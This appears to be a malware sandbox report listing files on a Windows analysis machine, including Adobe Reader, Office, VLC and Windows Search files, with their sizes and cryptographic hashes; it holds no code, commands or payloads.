27e7e5d29812e5f7e1038968d5ec42c6a1aa454def2cdfdba3773e5acddbe00792cbf10bf3d37461831dec45c6fc03e72d34c877e0b9106306de5e14de01fa46

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\exportpdf-selector.js

Filesize
175KB

MD5
4f6b0f611d0b324280ca910817473525

SHA1
dfbab643589aa652da66b8ea8f51f34c00feebdc

SHA256
60057f6be83208600e7d5e85a4b769297b2395798b616b62ed85d48d90f3a2da

SHA512
036986178717191d6c3a1f0620a3311fa0cac8c1b3fa8e982fcc99ca99d95af89211e96b240ae6bc221c5e253e336c7445639225eb436c4d8d59cfccb5e28892

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\convertpdf-rna-tool-view.js

Filesize
378KB

MD5
2f0dac7338b42384e38a0f892d1f7cbb

SHA1
304906cf812dc02bc456f6318361003a65455983

SHA256
413f46bb9178dd79fbde8a23017d811dd26586b39ba1602519e67a4f4d478386

SHA512
1b18bd034730abc2709a623f21e54998c460a9546c5d088d20e75af32927c3a884631f9049f710c044d3cae1e45248ddac70731cb4bc213f09b3accbfa45b7a7

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-il\ui-strings.js

Filesize
10KB

MD5
b00a32d9e9cca68a9c0ebdf74c85372c

SHA1
41c1f74abdbc992c8facd79ff64c0d0c15170a2e

SHA256
c0f47c29620bb2bcd943f96c62a1bf1185d4aefb8f0ce9615e0151ba58f0124c

SHA512
6b731afd4e79afb1c657a43696bddab092e5ab3cf5e79236403610d73804945aab6da8bef208e9317a592e39651644dc2c0215ef59e0b23ce4ab4d361ea9dcf3

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-ma\ui-strings.js.lock.2F6-A2A-068

Filesize
12KB

MD5
4791a6e93d6b6eed2a632febe8c018ae

SHA1
20cf13b1209631de4de0296653c6372bd4693b57

SHA256
cee9860958e82fce83997bf24a38d1dd1de66b1849a5df4b348806dcc5322dae

SHA512
e2ebd283c13b948f8fa078bb270930ca47e233839ad5f66438274bc4bcbaf58bef72435cf68f3ca9805c6be3bd6ee19b1d441acaa6b54aef4de911580e624a39

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\new_icons_retina.png

Filesize
18KB

MD5
13b449333f26207b73d21ef234cec154

SHA1
c45bd104f80643f57ce6bc8ffeca8984071e712b

SHA256
c7266648e553d7059a0b91e189b4fdd4a8bc873b79f0dadccdd2703e422cfb2b

SHA512
5183b8b03770942f1d4ec8dfae492213a185a9cbc30b78096782d55aac68c51dc2dcc8b6db0a0d14899b19f2005bedc9683e3edde80e0534da5ca8fadde05322

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-il\ui-strings.js

Filesize
6KB

MD5
6fed3cb099dd10b4e66b1668e42fe3d4

SHA1
4eb31464802933e043592890d478f4f45d6837aa

SHA256
d403dd65dc46ecd2666dbcdc13b6f9a15ac23b1a0332ca5b70653a77f52c073d

SHA512
047df9eaeced18fa441ca101f48552afaa444e0d727d972fcdfbe06bacbc90fedd61bd83e480e1cae77bf17fa6969699fd2eff6277947cde343eb22b41a5a04a

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-ma\ui-strings.js

Filesize
7KB

MD5
cfbecb25de328b27e166bbc8ae0e61e7

SHA1
206f9ebd1cbd619dc8407f6cd7fad6f449075da4

SHA256
5dbfb209a3c6d0ea612293a8b1284cb1aada4f2cc9fbb2fd66905063bb363ae8

SHA512
25dccfe20f6d9d6c526b55f31a2d9c82c128df7ecb33bf200da0520a26bafc242050a04ff7c2121f11744b64db358de187277a9c4b56b8b1a9b3e6a2a4f96efe

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf

Filesize
381KB

MD5
13d91b1f4eaae0d365082e4bd84bca54

SHA1
3b2b8ec58e372a602fe6e1a583f13273e94f86e5

SHA256
2fdaee3f07376c27c4ae63f240c38ff076f2f935f7510c75c9219e4c987d643a

SHA512
6b26ea029179673569c64b4e006b226072de1e10545d6fe0806c80893b33663543f3f468de2756a211027e174b5ed506b024d02b4ab559c73f653b9b581c9eda

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-il\ui-strings.js

Filesize
14KB

MD5
10907e61d514c961426131b94c2e29b7

SHA1
c3fdbd445da460b6c9f56db62e5e47581fd43f89

SHA256
e81cdd6b6c66508c973d50d3f7f30613be62609187c3a93bc57b702f68ac5916

SHA512
b226e8a0806cae6150fee69b1f6ca7bc604a095f219a3c4480fb2dd442ba9d48d9b61930c3773747af0ee2b0c528a2642598d70e8f7758ba8f9ccaf0edba0138

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-ma\ui-strings.js

Filesize
17KB

MD5
dc3fe9699c9b3cd4da4de9f85fb749e6

SHA1
49f508942ecf938205ddcb93dddcfe86dcdd85de

SHA256
5e04fe456c7857508e2b51bf008e56bf0fdfa6af18b1a25ff8181861d3e31d3f

SHA512
962378d682e01294a01c8d605ed22239fc6b0e6461aa214d69469da7aaadb4ed67e4b18704c61dcaca703066ac7bf7d6675c877e659c238276696ee121d517e7

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-ma\ui-strings.js

Filesize
18KB

MD5
409a439db023a52aa11f7c88f968c91b

SHA1
ad44a38db34892ed09b9d97fdbd87c62fd63a240

SHA256
88e4bc5a405a33581cff3e0a8e632ad74d70a399a51791c4cb1537626baa1885

SHA512
70678819f2e8ba88e2654dd74c7c31a8b344634b1a80cab656244e10a45db36f69a0de9dcf8487c9e1ca6d83508b1ff3d7c1e40aa281a24864ab68cc9eabac7e

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-il\ui-strings.js

Filesize
9KB

MD5
e69be07c639b4697d4bd587ff956c585

SHA1
8e0fdcb73bab974f85a25e19625b324f49e36de6

SHA256
e28231ed5d3e3f2169f749bb41ea25bb01268ffd85ff7e12abc0263958a4d4a9

SHA512
06e1825d3ae3d9b093d1a6aa2cb1f2b96e67e3ab02b3c0a995a2e4b14f4e5e65cb28ab0eddc68dae16520722d6a1b45025a0a20968c04a1e469a4a67be00a3a1

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-il\ui-strings.js

Filesize
15KB

MD5
09febed13782bb3c8e27326e443099b8

SHA1
22a02ac79b89215086a386d48b82f37e5dc0c66d

SHA256
e9b07e1c897f848332180a6b542bf81addd470595233861ebfef0e12d258c825

SHA512
849ae9c60ec54e2cb6d0784c0c491993a4461a77d7aa137fea830a3845c9c1d45a7a578d584c49cef8d477ee3dbc4875fa3aaf79403a6c32643c1fdad88a68fa

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-il\ui-strings.js

Filesize
15KB

MD5
5593d043beb46717be7787447c9efad2

SHA1
4b926f10b7b6f795cc6fc65fabaa8c866cca7fdb

SHA256
220d6b1d2a63bdb36c3dd6c7defff9771616983e728d1f7991c0816531d9fc03

SHA512
109d2e6b9d93544f4eb7910bc6e75e181bfa4236e66f405011c5bd4d07a4bb48cd68d5a66f661bd05b7d115cf0e5af174a9aaed9a3a7fece091018b15a926c7b

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-ma\ui-strings.js

Filesize
18KB

MD5
d9c2301e40fa3afaddccfaa79f7209ce

SHA1
e3accc263f73471e82c20ce1c290780dad56aba6

SHA256
62064f6d4f7ef3115d98e6aa52f5d8577bb94960e3297cd68836e4f8248783a8

SHA512
c8cbb889e394cbc501488a9e00c7613d87a11332ee49133be02b7f0325422b89eec75efc4558d7f013f1e2dd17f137716c9a4d702a1e93d095620804b1835112

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-il\ui-strings.js

Filesize
19KB

MD5
c0fbd2f17fdcd22703b40ff1c3e62697

SHA1
88f3b0e8e6484dd0c5ec381efd7a7fef79f9488c

SHA256
c645153f4d1ab6ffd6fc310aaa61df64592833c56fcd5273398483abf3432c2f

SHA512
a828a6728b8ad23434d45ed48fb2ab966c3af3376988331e4d7b0348fd4348a0fce7a88e17672744e4e434aec9f20dd15804a99cb195356f0d70352a77cf8db1

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\ui-strings.js

Filesize
23KB

MD5
ed8a2dc8caf4759f3cf4bf19d3473bc3

SHA1
45fbf2b0f0d6ccba8b473e26b9bce9152c1d8686

SHA256
a2c697d5268ab6e9682351e440e2e1a9748835eed3eaf78a799424aa468b588b

SHA512
760ee3865242f4c39c5d7e04466ce1899e3e64757acc1b026e34551025aab59ef947cef07435dcf1db43d5078a168e302fe3be2dfae096e61d6661fecca1a738

Download Submit
C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe

Filesize
4.1MB

MD5
e933fa566c6906c41ba011f5dec262cb

SHA1
52efe55e606dec2f7f2d4520e91f87482dc21c7d

SHA256
9c12ef4eb026a1523a1af9c3c355c4b18ba99c327b0d697b681eeaf2ec7f8910

SHA512
a40600521fd9c4c86c4582b8f7de404f326507e637d61714dc0ca9cee8fff92a9e085504d356fbe75f2a4644017db3f0cd14bfaa6322fa549aed1fa5f9b82067

Download Submit
C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\ISO690.XSL

Filesize
265KB

MD5
a38190862812b4c6c0f18762eab45983

SHA1
f53e4b9aed23faf7ab9ae9cd5dd1a1f7ddae9af7

SHA256
562ddb0d1f49038d07e0e95785fb2c591fd6cebbb28cc10670d4e242d0e3e446

SHA512
16c83a672512422e0d032f0bb3019a9ef427265be9ae4da87f83f62c23124c3af44ec0d27b524dccfcc9e23b7604ce746290e045d2467d646c17e06032d9f379

Download Submit
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\osmdp64.msi

Filesize
2.4MB

MD5
025331026fd8a3aeb4b79d5a1d30a675

SHA1
8dab8ed5e72e4350a1247672e04cf18360715dcf

SHA256
fad0afeb30ca3cc6d7a2cbc91e74d8b567a9ba5a7f2964706e6fb399f1730864

SHA512
e91737e860f5c9d1122d59b4a56be6d3756f9623942f5d20c426b22498459d05915817f916db31701ec1ccc79117fff1d18bf46e9a0692b3ec6ac5fe57fc4683

Download Submit
C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\osmclienticon.exe

Filesize
62KB

MD5
9ce116153a1e4171d4bd78570b031836

SHA1
a3fae73219cfb1c6bd7a503abb2091121f5c1be4

SHA256
1dc642f056e5c4cb2888554f4e46ce3f32379800a043472574eed179f6cc178c

SHA512
2a805bc6f87deea0dc8aa65bb6855bcea6dba1fd9f3d28207849e74d0d24a2495c67738665ee210d668d5708b5eaabc6eccf548abbb02506350a762cf8750d94

Download Submit
C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-1000-0000000FF1CE}\misc.exe

Filesize
1015KB

MD5
8cff0cfa1faab853e08e89247638baae

SHA1
364639608497891414abc0fe7e97b0a9f8b0d129

SHA256
0fc584f2426eb14192ca0086ce5058739718578a324ac1bde42abf3e246855e6

SHA512
19c289873c29f9a37b667a5d534a5fbe9a9078c6f2391e4c0272d1779d2b04984260ce145e75c070835290e44dc6b6de39f00c2a821a10e114756d4b763779b2

Download Submit
C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\vlc.mo

Filesize
605KB

MD5
d5330d6d42c9ced4706cbd14214ce30e

SHA1
34710a2d234bc092273c9f5bdfddc759036a1484

SHA256
f8c74f903733826748c8a39ef917421297b5b1a1e6f0c0cfac8c25f9183bda24

SHA512
75e6f482d8de721f2728c45439c3eadf2deddff7afb87fe3d57327e23a2b9ed962c53fe857782375c217e8d8fe5c78aab8b1da0be9e9053a1e6230975bec281b

Download Submit
C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\vlc.mo

Filesize
606KB

MD5
033d6a3ceb024473f8035576a9c93cae

SHA1
0df010deb3a0a55fdf06ce1a826aa029515b5ab0

SHA256
f4ddbf670ec8a3c943a89ef01f926f5831df398e294ffb302c4574e2ee39cb47

SHA512
bb7ee4a4fba0f980d1e481a5c87f418e45dff4fa0e030414fa7a01bd55973c304e83dc11ea18a35a470ec2dc7e766ced49e247c340d2dda6be139f487f1fa1ea

Download Submit
C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\vlc.mo

Filesize
587KB

MD5
f7cd62a2ba4400059358cb2103a2afde

SHA1
5515860842eabd82bb445d13a999ab04be2af813

SHA256
4278e9023558f775ac08da3d2d64689d157743d8830399442c981541abf64a57

SHA512
e691aab97bee66c5283ccbcd382887a97bbfd230255cebdcaf0d4951487d323e62fb92f5efea7fd5c525c11b6cb9ac9c493bdc9e0f686c81efcaf2fd4af67d2a

Download Submit
C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\vlc.mo

Filesize
764KB

MD5
c2e1d2e25ecd0ec5e74c76ac157696a2

SHA1
8592702bd1722ef7cb8f8d3e4ef93ab6ffdc557f

SHA256
404342e3b9232f41c80b0c876b12515a407e7d4921c967cc920d55db6251f3ec

SHA512
d3ab1db79e3c5acd0d4494ba3ca8ced6df04e4f878e14678d9c4071ca905ef7e82ad4b56a241ee9c2147b3eb3d0831f0fff53f0c52c9e3f78378204925b61c14

Download Submit
C:\Users\Admin\AppData\Local\Comms\UnistoreDB\USSres00002.jrs

Filesize
3.0MB

MD5
6b0b3773776f03d0c543c25ba3d9616d

SHA1
71daf2d2ab4b5ea352259a039e5cf01159c49f50

SHA256
fd9e6b16315e01084bef4bfb59356a4fb63225c80dcd2cc79da7a83102eeb31b

SHA512
d03523e7c96006b19e3b9cb45252b572264cf019490d7c0ebf0b691bbc373f8488d91a22e916346f1d79777cd68c7c3a02ec225e8e596b5959925f47ce0c9842

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\settings.dat

Filesize
9KB

MD5
7dca8610894a368c91c8ca071cbd23bb

SHA1
fd06d7219831543b20bf42043aa98b51660c7ca3

SHA256
c746566d38ac57c65f797a6e92ff2b2dfc2ed98b8e82f59e84526986d5a570d9

SHA512
57dfa65f973a8b8072776067bbb7bcec59dcb2db3ca1f9e3d6bc13e88e15665aaa6a39cebaf5c690b4672ce4b29b9b30d1367cafb5ac4c1d00a6be5190802891

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\settings.dat

Filesize
9KB

MD5
7d52139ddb7275a80d905f3510a76294

SHA1
4012508fe94d896849213b77c80fa1962fd29f2e

SHA256
7e68e05a163d31412d3660988fd13d7f4c3d30308f460d86b1fb45956ed6df21

SHA512
9cd44116a5d41ebf7e35385ef8173ba5d0288e217440dbe047623f16db1da392679d36f687790b47aaa362244a12c120f1a60996025812c1f81a66dd58611e16

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\Settings\settings.dat

Filesize
9KB

MD5
a366229b3b16d577112a0f18b8c111cb

SHA1
ccf3568ddb764e3cb9a8cd36cbcf25b71fab0824

SHA256
6c88af4e1d467e43e11dcb8abbda9781a1ae5ad1279e52c146b1fe9309a6bad4

SHA512
ec78c9f85a12f9d3e3af798416a7232ad850d0f00e9f702b4edb1c37709b9468f5dfc3cade51710b2c01e9be6d8d558aab968185f0aeec62145667c74ffcada1

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{51325390-AE6A-68FC-A315-0950CC83A166}

Filesize
37KB

MD5
7e161b48932cbd4cf172697561362b47

SHA1
abefe7cfc6aa39a5eb61e3fb61195b16ba2f6081

SHA256
53da8cb6508dfdb644683f7742198e4807cac1195754ae5449f5f5cf9b265acb

SHA512
5bdc8ba6db9bf9e39bd83153909a66f0b815f4ade494721abb6cd0e269f9d967604498e9b939f09d1f5028239996ff18f17c901ec0e8248dde6274cc419c7d6c

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_DATABASECOMPARE_EXE_15

Filesize
37KB

MD5
e8cc7aac8a2f677c47bb7cd9e9cba06d

SHA1
0217917876dfcabf08f0e76957d424e69c1725d0

SHA256
b46a08793b4d6147b36565e2ea5e99a5258d8986bcc3c9f2ed786722cc47ca20

SHA512
1fe6b8b9b4cdb7462dfd50418494b1945b1db574f3a9e269bc9872f269acaa1c9fc33882e0465baac28621c05dc2b71cb95c9b98524efafd1329d5e7fc9077bc

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_SPREADSHEETCOMPARE_EXE_15

Filesize
37KB

MD5
d6ef9f8a5c1070bfc133e39e13960387

SHA1
229897a385109943b425f1055553ba9e09086dd2

SHA256
5587f574de4712f97b9179b140bf160d88293c30654b204ea1e73224ab823746

SHA512
c13292ea7de6cafd5b17ea7b63881ca8dcad95ff4ec5e4880b71a5301a3735078b0fd0ca136a85266a8261cb03a061efb1348a2e96706834b4e078718e59f1be

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\https___java_com_

Filesize
37KB

MD5
b0116896122c49e893d9b4f8c9f8413d

SHA1
0b13682ae08c2973198780935e1ff20e4b68264d

SHA256
32108c87afa2049a760fdb3e806e4837f6a78416cdc9ab81b202fe580dcdf79c

SHA512
13d1dfeb114b1d80990d5801023096a8b0f3988dbd6f81d5261d7113f8bee27beda304c6e5d8a71bf917f6a2804b6a4484681abfabfff8ff251d7fb43bcdfc02

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_powershell_exe

Filesize
37KB

MD5
538c772e55e6fd9a84eb9c77073685b0

SHA1
62558c09657536edfbff93c8acc2164db047bc15

SHA256
499b74eb14a8b7a1729e6d2e1f976a776b8b9927a04756a66c77c900e622f56b

SHA512
a5b0326500ab0533cb42ab1d3277f14b72f53ab0d7cd4ab24621daf222e6ac84585dcfdb0de00b6ed1c903861238742829f5401962f40b36fbb0fca370a6f7c7

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_cleanmgr_exe

Filesize
37KB

MD5
9203a1e07567c5aaf2ab8595383518b7

SHA1
046bdca8d9b09562a11f8c57658b5ac9cc69a8d5

SHA256
be4ce149d1b318a2865386fa822a390195ad7ae7a4cab9d82c22bf1dd4679710

SHA512
bc12c7b14618e6778d497cd17476912a78f25436dd2094d511a9af99bd07a7515fcdcd0620efb5da4306714b03ea92b4f7dd5f631ef4e8443ecb55e33b789056

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_msinfo32_exe

Filesize
37KB

MD5
57f2ff0f3e88fca55f3fe34d435af5c5

SHA1
6ac60d672a41c1837386e8ba8ae099f71bf01abc

SHA256
82d0501184b21233a576cd0025d08e055b352fe8f0f9c6457065c729850058f7

SHA512
bd770dafc4c70aa7ab7bb30c651f1e6c18b4e314fbd0ddbf399a9cea11d04fb905688b33582e18541e52a754d709455bdb92e31e6980a2db5cec025d98e62313

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_7-Zip_7zFM_exe

Filesize
37KB

MD5
2619ead451ecffadbc6e9d08b7ef4a03

SHA1
a604cf3609b41f02e0859be6e1528849ced849ae

SHA256
2aa72db546c7683be0233b5aa74f7269d5d66fa7ed366f9c5ec845788d584ea4

SHA512
f04cfc6be018f3d00140c310be39d85d2fb7bb9ce149d491e96d4e4cf999d184f5712f4dc3d6556917dcc9228a9442b4227da91232e548572c0c4abcf2379162

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_VideoLAN_VLC_NEWS_txt

Filesize
37KB

MD5
96fed056a75fc6d2ed836d6679456ca2

SHA1
e531ece0e095955b9c8a5a3e49803bc9a222f76d

SHA256
1bd69805b6d100bb878036f08b1fb387578f150c066c24de285929cc7d064c13

SHA512
8270b705838256b77994f7388c4fae97d86150f442177d9497397dea77aa0742c060633f31ad0b7bf84b22b88ca3b52b3ad649c1ef701e299d09f6a215dd350d

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_WindowsPowerShell_v1_0_PowerShell_ISE_exe

Filesize
37KB

MD5
88bcca4120279abcbfbc6a2abea97e20

SHA1
60c6cbe71845beefb078d145bf93d5427888a89f

SHA256
2e9d3ba9c0fa65a22efcd254840b6e0fffbc52be2937db22e10c04388726ffde

SHA512
885c1072baa7834dc5f888bbf4a14a02ecb5ab16a7708e013995de91ad1eafd13985ff90a14b400157cd3c5ca8b89bdd47356ac128a716c206481b0cb5df2797

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{4bed023f-6194-480d-8d55-0d702ef01535}\0.0.filtertrie.intermediate.txt

Filesize
30KB

MD5
8822c8e29c606a59007040a0540395ad

SHA1
c43f6cb2be473755478f368021d1773f96773588

SHA256
ca0309f4381874dbf02ca83babd863b356731dd45e9f7abda4ba09c9afb27c01

SHA512
54b4d387c8aab2a1eb8324100be63458c2b64979dae930ff3f45820e01eb83599b23f1ea29fa13238304f029347793ba6dd488e8856bd197d23321eeddc30a56

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{4bed023f-6194-480d-8d55-0d702ef01535}\Apps.ft

Filesize
39KB

MD5
446415e066b233e025aa1a4c7cc7f221

SHA1
d5a1fe4a6cbdcf5ff00f1b5dfcd11a9074b44f42

SHA256
605d30ed038643bd96318a0395129aaae664f0ffbb939f902690d72206bd36af

SHA512
4b33f2e2e4465861506408a9c37c12256262900e9d9f70a5406c88b4213f909784904027dd2b6670d1486f60dc2be16237f5c112c3152f7bc704db3dc7215d7e

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{4bed023f-6194-480d-8d55-0d702ef01535}\Apps.index

Filesize
1.0MB

MD5
21df6c4b3dd057656b63d531ee255760

SHA1
bd1fb4b89fbd8baec7b28f80b2a107cf3ce3f0ce

SHA256
d3a99ea3b6f58df06c81c0103018ccd020d63c80068fe759dda8979251eb3d2d

SHA512
3d11c1ea320a5bcaf368a3b9f91a27102b97f4861e347b6fa98acbbb5249f64012d3556b401dce7cc50446fee9b0057436761ea0fe5bd0f0dc753f901100f227

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{f2221bba-51b1-4f0d-85c9-bf2fbf9592ed}\Apps.index

Filesize
1.0MB

MD5
3f9222155fefda058e874dcba05ba101

SHA1
07f07227f325031cf856ebbafabebdbcc203e6a2

SHA256
2969ff3b6475069af754b2aae43bbcf2c288cb22b29ea4d864e2a4d9ca41826b

SHA512
006041e039a0a24467b7c9d1fba9a53642079b33c94456653b6de594c20ae490f0f8105b3c2e6b9cf0c9cac471092fb89f091bfa6db1c0c08546181dce7884b2

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{384d0473-fdc1-499f-bde3-6c1ea7a5eb67}\Settings.ft

Filesize
226KB

MD5
41f174209e289900c6019bdeefd3824d

SHA1
a66514d001447c4c200e5901f9e772cdc4b4da28

SHA256
f96f4d8873765897576dcf479d794bc28072f0909db56ac6d4e920c083e5a84d

SHA512
2e5450fdd4ac90cb1c5730a409b53ab1696bd5f139980877a995e7118d9ec404e733390f3a8e18d2d9ddf45fa448fcdf9083bf7d2bb885a3d94b6aae9ba622f9

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{384d0473-fdc1-499f-bde3-6c1ea7a5eb67}\Settings.index

Filesize
1.4MB

MD5
f8e494fa86c9c09717f03526aac9f0f7

SHA1
ffe1d9018cae3153d364777e598e6c76f1a2492b

SHA256
1c603843bc1242d0488df163524b61542e63321bf1deeee578b52bc81904dd5b

SHA512
d6bb76c9bf5616491da544c7f8cc9bbe5ccf5eae5100b095bd3cbb8ea31277ca3439963b4477279b97890cf2ff92f900b5268c18e09fc905c62cd1b6b4851cc2

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133529826265915719.txt

Filesize
78KB

MD5
f30c222581352bcf250ca4ed89c73e0f

SHA1
d14d89fbb905709eaf8169225a76ad33f511d845

SHA256
f04a7df0b758685e09c71abe46b45dfcd01176d149a427f52d7ad3aea5b364c0

SHA512
32ff829fec71277108e7fa9a0f04cc1c4b5ea075f3c568e77f66d293142a0fc539c70c322d2565b05900a35d1fce2e9123eaaf4f8867a7a2f64cb253b2780fba

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133529827190092084.txt

Filesize
48KB

MD5
14d76fc851be28859726c70eddded1bb

SHA1
157defccd8b3b116672367159e8a95b26119b475

SHA256
1ef07e43babc2c56c8e818a707cb90e52de3ed7f7ecb0cf203418bb15fa53745

SHA512
fae7cc1da48d998b4e6d4787e243e2941e9271d8bbafc424cbc9b5c316fb31eeae97b48e861b923423119e71fa68e1f3ea74de78d2b062231be3673fdaaffd75

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133529836149742771.txt

Filesize
76KB

MD5
c590085ae496f9ccaa7aae3cc7a09eaa

SHA1
959ee2b10cbbc4a80b22b384d1cfe7cff34e9b37

SHA256
ca1f5082bd3a94012648d65ee3da870540ebffb433cb151d34812bd787ccf7f4

SHA512
1feca02ef00e6db683e1df073a7dfeeb42653af56ab1a4804bef51d1e8e758b3da6115ccc91b3de5f69787795bd14f40a057354b37dd01474d1aa6b2a1e75a2e

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.XGpuEjectDialog_cw5n1h2txyewy\Settings\settings.dat

Filesize
9KB

MD5
8258a05060e214165edd7bc03d2f2913

SHA1
5e05961e09e35d6ef8e1bd853a5660d8f3c7a739

SHA256
8994dd08256f8562f2f2939ff9443646f37e33cbaf145cb5c6a476dd8aa9f101

SHA512
7fafd3990a48859269a86fc6aa032324ac2f3f757055bf121d86ca185ff4c9d7b99078cb8a5b862aecb46e669838647f2444b0961aee9fea984e7233d0018799

Download Submit
C:\Users\Admin\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\Settings\settings.dat

Filesize
9KB

MD5
49938d6686c1f33c6857bfb191b784e6

SHA1
a60c2e228b2f96a0873fb5a132c74f1e151a5bb8

SHA256
6e5943b049a37fe9168e9b76c4fa50cd4a6a0dd81c21de9214e7555da17acd4c

SHA512
ffeb13968b21beee5f4a69a768ceb125e7d81c37bbbbb9798debc91a1e1142217a3451ff52ed1411d238fa78b166992d68fa1342f29097799594d3662299df91

Download Submit
C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\settings.dat

Filesize
9KB

MD5
f1bdb2a6ade08ab1a5b5780a9d44d63d

SHA1
b3a7227e93c0f8ff4d55f363637f138619f567e2

SHA256
f35a86171429c3990f7d3fdb641ca384a76e0b1edfbe4f81d3bfc115c539dbb3

SHA512
e6f583794668303fe42a198d3b1cdec850c5fe10f9e6844e14d550528f7c53e19ac42d668a90d62cffb663302fc032108ad2b5dd96963b566bade2bfc0963095

